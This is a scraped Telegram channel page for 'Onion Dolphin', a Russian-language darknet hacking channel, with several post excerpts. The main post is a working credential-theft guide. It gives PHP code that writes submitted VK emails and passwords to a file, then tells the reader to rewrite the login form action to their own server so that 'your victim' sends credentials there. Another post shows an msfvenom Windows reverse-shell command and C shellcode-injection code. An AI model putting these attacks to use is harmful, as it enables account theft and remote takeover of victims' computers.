Onion Dolphin
Новые посты пишут те, у кого старые плохие IT канал о даркнете. Авторский конь-тент. Ссылка на канал @DOLFX Сотрудничество | Редакция @Lazy_Adm | @Lazy_Adm_bot Дельфин умный - будь как дельфин.
إظهار المزيد- المشتركون
- التغطية البريدية
- ER - نسبة المشاركة
جاري تحميل البيانات...
جاري تحميل البيانات...
Discover the attack surface and prioritize risks with our continuous Attack Surface Management (ASM) platform - Sn1per Professional #pentest #redteam #bugbounty - 1N3/Sn1per
apt -y install php apache2 nginx
php -S ip:8080
ip - пишем локальный или глобальный адрес если мы выполняем на серверах все, пишем адрес сервера - php -S 8.8.8.8:8080
2. Создаём файл vk.php и директорию
mkdir vk_hack;cd vk_hack
nano vk.php | ставляем в файл vk.php код:
<?php
file_put_contents("password.txt", "VK" . $_POST['email'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
header('Location: https://m.vk.com');
exit();
3. Заключительный этап
php -S ip:666 | Запускаем сервер!
Заходим на сайт m.vk.com, жмём F12, открывается инспектор, ищем параметр POST, нас интересует строка:
<form method="POST" action="https://login.vk.com/?act=login&_origin=https://m.vk.com&ip_h=f97a0bda5e3a6eac62&lg_h=2956e404aa19a76137&role=pda&utf8=1" novalidate="">
Стираем ссылку -
https://login.vk.com/?act=login&_origin=https://m.vk.com&ip_h=f973aac62&lg_h=29a761&role=pda&utf8=1
Заменяем ее на свою:
http://{ваш IP}:666/vk.php, закрываем инспектор, если обновить страницу все вернется на свои места, ссылку снова придётся менять!
Далее ваша жертва, вводит данные на домене m.vk.com где стоит SSL и переходит на нормальный m.vk.com, а у вас данные будут в файле password.txt
Onion 🐬 DolphinVK is the largest European social network with more than 100 million active users. Our goal is to keep old friends, ex-classmates, neighbors and colleagues in touch.
Выполнение шеллкода в локальном процессе Сперва проведем простенький тест по запуску шеллкода прямо из нашей программы на C или C++. Генерируем шеллкод для reverse shell: Код: msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.0.0.5 LPORT=443 -f c -b \x00\x0a\x0d Код для инжекта и вызова нашего шеллкода: C: #include "stdafx.h" #include "Windows.h" int main() { unsigned char shellcode[] = "\x48\x31\xc9\x48\x81\xe9\xc6\xff\xff\xff\x48\x8d\x05\xef\xff" "\xff\xff\x48\xbb\x1d\xbe\xa2\x7…
Большую часть прошлого года я работал над энергетическими проектами, кульминацией чего стало ответвление, стремящееся стать первой в мире энергосистемой на основе блокчейна. Благодаря моей работе у меня также была возможность взаимодействовать с рядом людей и крупных организаций, вступающих в криптопространство, которые неизбежно приходят к одному и тому же вопросу: Как хранить криптовалюту? Какой способ обращения с криптовалютой самый безопасный и удобный? Лучший ответ на данный момент – наверное, аппаратный…
Обновим пакет: apt update apt upgrade Качаем питон: apt install python Теперь через пип саму программу: pip3 install waybackpack Один из примеров использования: waybackpack dol.gov -d ~/Downloads/dol-wayback --to-date 1996 Вот такой результат: ~/Downloads/dol-wayback/ ├── 19961102145216 │ └── dol.gov │ └── index.html ├── 19961103063843 │ └── dol.gov │ └── index.html ├── 19961222171647 │ └── dol.gov │ └── index.html └── 19961223193614 └── dol.gov └── index.html …
Занимает это всё примерно минут 10 и работает достаточно неплохо. Если говорить о весе, то весить будет после установки почти 1гб. В отличии от других версий для линуксоидов, тут будет работать чуть иначе, привыкнуть можно, но F та же. Для начала скачаем сам Metasploit. Пока будем скачивать, нужно полностью отключить антивирус т.к он будет мешать установке и самой работе Metasploit. После загрузки запускаем и переходим к установке. Ставим всё по дефолту, но где будем указывать порт для SSL укажем например…
تسمح خطتك الحالية بتحليلات لما لا يزيد عن 5 قنوات. للحصول على المزيد، يُرجى اختيار خطة مختلفة.